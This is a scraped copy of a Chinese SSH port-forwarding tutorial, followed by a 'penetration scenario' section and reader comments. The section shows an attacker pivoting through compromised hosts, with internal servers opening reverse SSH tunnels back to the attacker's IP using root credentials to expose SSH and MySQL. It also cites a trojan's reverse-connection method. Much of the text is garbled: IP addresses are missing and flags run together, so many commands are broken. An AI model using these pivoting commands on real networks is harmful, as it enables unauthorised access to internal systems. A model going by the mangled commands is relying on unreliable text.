ssh端口转发情景模拟 作者yirendai_sec_第1页
ssh端口转发情景模拟 作者yirendai_sec_第2页
ssh端口转发情景模拟 作者yirendai_sec_第3页
ssh端口转发情景模拟 作者yirendai_sec_第4页
ssh端口转发情景模拟 作者yirendai_sec_第5页
已阅读5页,还剩10页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、SSH端口转 景模拟作者:yirendai_sec原文链接:/articles/network/129434.html 收集整理:/test/index.php本文由 干货1 SSH端口转景模拟yirendai_sec2017-03-21 共588191人围观 ,发现 14 个不明物体 SSH会自动加密和所有SSH客户端与服务端之间的网络数据。这一过程有时也被叫做“隧道”(tunneling),这是因为SSH为其他TCP链接提供了一个安全的通道来进行传输而得名。例如,Telnet,SMTP,LDAP这些TCP应用均

2、能够从中得益,避免了用户名,以及隐私信息的明文传输。而与此同时,如果您工作环境中的 但是允许SSH的连接,那么也能够通过将 TCP 端口转发来使用 SSH 进行通讯。限制了一些网络端口的使用,(一)概述SSH端口转发能够将其他TCP端口的网络数据通过SSH链接来转发,并且自动提供了相应的加密及服务。 (二)功能1、加密SSH Client端至SSH Server端之间的通讯数据。 2、突破的限制完成一些之前无法建立的TCP连接。 (三) 方式共有四种方式,分别为本地转发,远程转发,动态转发,X协议转发(I)本地端口转发SSH连接和应用的连接这两个连接的方向一致 ssh -L : ,Localh

3、ost参数可省略,默认为0:0:0:0,但为了安全性考虑务必使用作为本地口。 端将本地机(客户机)的某个端口转发到远端指定机器的指定端口;本地端口转发是在localhost上如下: 一个端口,所有访问这个端口的数据都会通过ssh 隧道传输到远端的对应端口。登陆前本地主机端口状态:2localhost: ssh -L 7001:localhost:7070 sisca关键字查找 登陆后本地主机端口状态:登陆后远程主机不会端口。 小结:本地端口转发的时候,本地的ssh在7001端口。 ()远程端口转发SSH连接和应用的连接这两个连接的方向相反 ssh -R

4、 : ,Localhost参数可省略,默认为0:0:0:0,为了安全性务必使用作为本地端口。 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口;远程端口转发是在远程主机上应端口。 如下: 一个端口,所有访问远程服务器的指定端口的数据都会通过ssh 隧道传输到本地的对登陆前本地主机端口状态:登陆后本地主机端口状态:3localhost: ssh -R 7001:localhost:7070 sisca 登陆后远程主机端口状态:小结:使用远程端口转发时,本地主机的端口并没有发生变化,相反远程主机却开始我们指定的7001端口。 ()动态端口转发把

5、远端ssh服务器当作了一个安全的服务器 ssh -D : ,Localhost参数可省略,默认为0:0:0:0,为了安全性务必使用作为本地端口。 建立一个动态的SOCKS4/5的通道,紧接着的是本地的端;动态端口转发是建立一个ssh加密的SOCKS4/5。 通道,任何支持SOCKS4/5协议的程序都可以使用这个加密的通 道来进行如下: 访问,现在这种方法最常用的地方就是登陆前本地主机端口状态:登陆后本地主机端口状态:小结:使用动态端口转发时,本地主机的ssh进程在指定的7070端口。 ()X协议转发把远端ssh服务器当作了一个安全的服务器。 ssh -X 4localhost

6、: ssh -D 7070 sisca 如,我们可能会经常会远程登录到 Linux/Unix/Solaris/HP等机器上去做一些开发或者维护,也经常需要以GUI方式运行一些程序,比如要求图形化界面来安装 DB2/WebSphere 等等。这 时候通常有两种选择来实现:VNC或者X窗口,让我们来看看后者。一个比较常见的场景是,我们的本地机器是Windows操作系统,这时可以选择开源的XMing来作为我们的XServer,而 SSH Client则可以任意选择了,例如PuTTY,Cygwin均可以配置访问SSH的同时建立X转发。 SSH端口转发除上述四个代表不同工作方式的

7、参数外还有一些附属参数: (四)场景模拟场景一:将本机的80端口转发到6的8080端口接着会提示输入master的,或使用-pw参数完成 场景二:一次同时映射多个端口Ssh -L8888::80 -L 110::110 -L 25::25 userhost,同时把服务器()的80,110,25端口映射到本机的8888,110和 25端口 场景三:A内网主机能放问公网的23的22端口,但是不能访问公网34的21端口,但是这两

8、台公网主机能互访。A主机:ssh -CNfg L 2121:34:21pw abc123 user23 ;然后A主机:ftp:/localhost:2121 前提是获取23的22端口账号口令(普通和root口令均可以,区别是转发的端口问题) 场景四:A内网主机能放问公网的23的22端口,但是公网B主机23不能访问内网的A主机。A主机:ssh -CNfg R 2222::22pw abc123 user23;B主机:ssh

9、 p 2222 前提是B主机开放22端口,账号口令(自建ssh服务器,或用肉鸡),灰鸽子木马用的也是反向链接,Destination (LAN_ip) - |NAT| - Source (home_ip) 场景五:A内网主机只能访问公网的23,但是A如果想访问公网的很多资源。A主机:ssh -CNf D 1080 pwabc123 user23;A主机浏览器socks 5 proxy设置为localhost:8888,所有之前无法访问的网站现在都可以访问。 5ssh -C f g N L 80:6:80

10、80master6-C:压缩数据传输 -N:不执行脚本或命令,通常与-f连用 -f:认证用户/,通常与-N连用,不用登陆到远程主机,如果通过其他程序控制隧道连接,应当避免将SSH客户端放到执行,也就是去掉-f参数。 -g:在-L/-D/-R参数中,允许远程主机连接到建立的转发端口,如果不加这个参数,只允许本地主机建立连接。 场景六:A内网主机开了http、ftp、vnc(5901)、sshd、socks5(1080)、cvs(2401)等服务,无合法ip地址;外网主机B(23),开了sshd服务,有合 法 ip ;我们的目的是让internet

11、上的任何主机能访问A上的各种服务。B主机:sshd服务端做点小小的设置:vi /etc/ssh/sshd.config加入 GatewayPorts yes,然后重启sshd服务:/etc /init.d/ssh restart 或 /etc/init.d/sshd restart或使用-g参数 A主机:ssh -CNf R21::21 pw abc123 user23 公网其它主机:23:21 场景七:A内网主机开了http、ftp、vnc(5901)、sshd、socks5(1080)、cvs(2401)等服务

12、,无合法ip地址;外网主机B(23)开了sshd服务,有合法 ip ;我们的目的是让internet 上的任何主机能访问 A 上的各种服务。A主机:ssh -CN R1234::80 pw abc123 user23 B主机:socattcp-listen:80,reuseaddr,fork tcp:localhost:1234 公网其它主机:23:80,此时就是访问内网主机的80端口 场景八:PuTTY自带的plink.exe实现ssh6 (五) 渗透情景模拟A为攻击主机,开启的ssh

13、服务B为web/应用/数据库服务器,开启22/80/3306端口 D为肉鸡,开启22端口情景一:7PLINK.EXE-C -N -D :7000 est202.115.22.x:21314 ssh -CfNg -D:7000 est202.115.22.x:21314 方法一:socks5 A: ssh D 8080 rootB_IP pw root方法二:本地端口转发(B的3306端口) A:ssh L 3306:B_IP:3306 pw root rootB_IP方法三:远程端口转发 B: ssh R 3306::3306 pw roo

14、t rootA_IP 情景二:法一:socks5 A:ssh -D 8080 rootA_IP pw root B:ssh -R 8080::8080 pw root rootA_IP法二:远程端口转发(将3306端口转发) B:ssh R 3306::3306 pw root rootA_IP 情景三:法一:socks5 A:ssh -D 8080 rootA_IP -pw root B:ssh -R 8080::8080 pw root rootA_IP法二:远程端口转发(将3306端口转发) B:ssh -R 3306:C_IP:33

15、06 -pw root rootA_IP 8 法三: B:ssh L 1234:C_IP:3306 pw root rootC_IP B:ssh R 3306::1234 pw root rootA_IP 情景四:一、22端口转发 A: ssh L 2222:B_IP:22 pw root rootD_IP 3306端口转发 D: ssh L 3306:B_IP:3306 pw root rootB_IP A: ssh -L 3306:D_IP:3306pw root rootD_IP 二、 22端口转发 B:ssh R 2222::22 pw root r

16、ootD_IP A:ssh L 2222:D_IP:2222 pw root rootD_IP 3306端口转发 B: ssh L 3306::3306 pw root rootD_IP 9 A: ssh -L 3306:D_IP:3306pw root rootD_IP 三、 22端口转发 B:ssh R 2222::22 pw root rootD_IP D:ssh R 2222::2222 pw root rootA_IP 3306端口转发 B: ssh R 3306::3306 pw root rootD_IP D

17、: ssh -R3306::3306 pw root rootA_IP 四、 22端口转发 D: ssh L 2222:B_IP:22 pw root rootB_IP D: ssh R 2222::2222 pw root rootA_IP 3306端口转发 D: ssh L 3306:B_IP:3306 pw root rootB_IP D: ssh -R3306::3306 pw root rootA_IP 情景五:10 一、将C的3306端口转发出来 D:ssh L 3306:C_IP:3306 pw root rootB_IP A

18、:ssh L 3306:D_IP:3306 pw root rootD_IP二、 将C的3306端口转发出来 B:ssh R 3306:C_IP:3306 pw root rootD_IP A:ssh L 3306:D_IP:3306 pw root rootD_IP三、 将C的3306端口转发出来 B:ssh R 3306:C_IP:3306 pw root rootD_IP D:ssh R 3306::3306 pw root rootA_IP四、 11 将C的3306端口转发出来 D:ssh L 3306:C_IP:3306 pw root rootB_IP D:ssh

19、 R 3306::3306 pw root rootA_IP 通过将TCP连接转发到SSH通道上以解决数据加密以及突破的种种限制。对一些已知端的应用,例如Telnet/LDAP/SMTP,我们可以使用本地端口转发或者远程端口转发来达到目的。动态端口转发则可以实现SOCKS从而加密以及突破对Web浏览的限制。当然,端口转发还有很多好用的工具供大家选择。本文参考了网上之前的文章,并加入了自己的 理解,感兴趣的话可以搞个环境实验下,如有问题,希望各位批评指正。 参考:实战SSH端口转发SSH的端口转发 *本文作者:宜人贷安全应急响应中心,转载请注明来自Freebuf.COM这些评论

20、亮了ttzer0 10几年前的东西好意思拿出来吗 回复亮了(7)12已有14 条评论 ttzer0 2017-03-21 10几年前的东西好意思拿出来吗 1楼 回复亮了 (7)ttzer0 2017-03-21 我发现现在很多文章没什么新意,配点大图就发表,感觉很高大上 2楼 回复亮了 (1)evil7(6级) 入梦落樱满熏香,梦醒犹记四月谎 2017-03-21 3楼 回复请问一下这个流程图用什么生成的。蓝图风格挺好看的。 亮了 (1)飘过 2017-03-21 挺好的,至少是知识的总结。 4楼 回复亮了 (0)as123dsa (1级) 2017-03-21 挺好的,至少是知识的总结。 +1 5楼 回复亮了 (1)datelove (1级) 2017-03-21 确实是有点老了,不过总结的还是挺全面的,亮点在流程图 6楼 回复亮了 (0)xxdx 2017-03-21 挺好的,总结的很全面

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论